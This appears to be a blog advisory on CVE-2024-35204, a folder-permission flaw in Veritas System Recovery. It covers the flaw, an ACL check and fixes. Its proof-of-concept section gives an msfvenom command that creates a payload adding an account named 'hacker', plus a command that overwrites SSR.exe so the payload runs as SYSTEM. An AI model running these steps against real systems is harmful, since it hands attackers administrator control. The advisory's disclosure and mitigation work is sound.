A new security vulnerability, CVE-2024-35204, was recently disclosed affecting Veritas System Recovery software before version 23.2_Hotfix. This vulnerability is caused by incorrect permissions on core application folders, allowing low-privileged users far more access than intended. In this long read, we’ll break down what’s going on, show you exactly where the problem is, and explain how it could lead to a serious escalation of privileges — all in plain American English.
What is Veritas System Recovery?
Veritas System Recovery is a popular backup and disaster recovery solution for Windows servers and workstations. It allows administrators to schedule and manage system snapshots, backups, and restore operations. In most organizations running Windows server environments, Veritas System Recovery is often running with *high* system permissions.
What is CVE-2024-35204?
This CVE documents a flaw where the installer and files of Veritas System Recovery (in versions before 23.2_Hotfix) set folder permissions *too loosely*. Instead of restricting access to just administrators and the SYSTEM user, these folders allow *any authenticated user* to write or overwrite files in the application directory.
That means if a malicious or low-privileged user is present on the same Windows system, they can *replace* or *inject* files into the Veritas directory. When a system or admin launches the Veritas software or service, it might unknowingly execute the attacker’s code — leading to complete compromise.
Affected folder (default on x64 systems)
C:\Program Files\Veritas\Veritas System Recovery\
Incorrectly configured ACLs (Access Control Lists) allow the Users group (which includes all regular Windows users) to create and modify files here.
To check permissions via PowerShell
Get-Acl "C:\Program Files\Veritas\Veritas System Recovery" | Format-List
Look for an entry like
Path : C:\Program Files\Veritas\Veritas System Recovery
...
Access : BUILTIN\Users Allow Modify, Synchronize
...
This means any *user* (not just admins) can potentially drop malicious files in this folder.
Proof-of-Concept (PoC) Exploit
Let’s say an attacker wants to gain administrator rights. If there’s an EXE or DLL in the Veritas directory executed by SYSTEM or admin users, replacing or hijacking that file allows them to run any code as admin.
#### Step 1: Identify Targeted EXE/DLL
Inspect running Veritas services or scheduled tasks to see what binaries are invoked (for example, SSR.exe).
The attacker creates a payload, for example with msfvenom
msfvenom -p windows/x64/adduser USER=hacker PASS=Password! -f exe -o malicious.exe
As a low-privileged user (who shouldn’t have this power!)
Copy-Item .\malicious.exe "C:\Program Files\Veritas\Veritas System Recovery\SSR.exe" -Force
Step 4: Wait for Scheduled Task or Service to Run
Once another user — or a scheduled task with SYSTEM rights — runs the binary, the attacker’s payload is executed as SYSTEM.
Mitigation & Fix
Fixed In: Veritas System Recovery 23.2_Hotfix
Mitigation: Upgrade immediately to Veritas System Recovery 23.2_Hotfix.
If you’re stuck on an older version, restrict access to the folder manually
icacls "C:\Program Files\Veritas\Veritas System Recovery" /inheritance:r /remove "Users"
And ensure only Administrators and SYSTEM have write permissions.
References
- CVE Database Entry: CVE-2024-35204
- Veritas Support Bulletin
- Exploit Writeups & Discussion (Twitter/X)
Final Thoughts
CVE-2024-35204 is a classic example of how simple permission misconfigurations can have huge impacts, especially in trusted enterprise software. If you run Veritas System Recovery, *patch now* or risk your users — even the lowest-privileged ones — getting full admin rights.
Timeline
Published on: 05/14/2024 15:39:42 UTC
Last modified on: 07/03/2024 02:01:28 UTC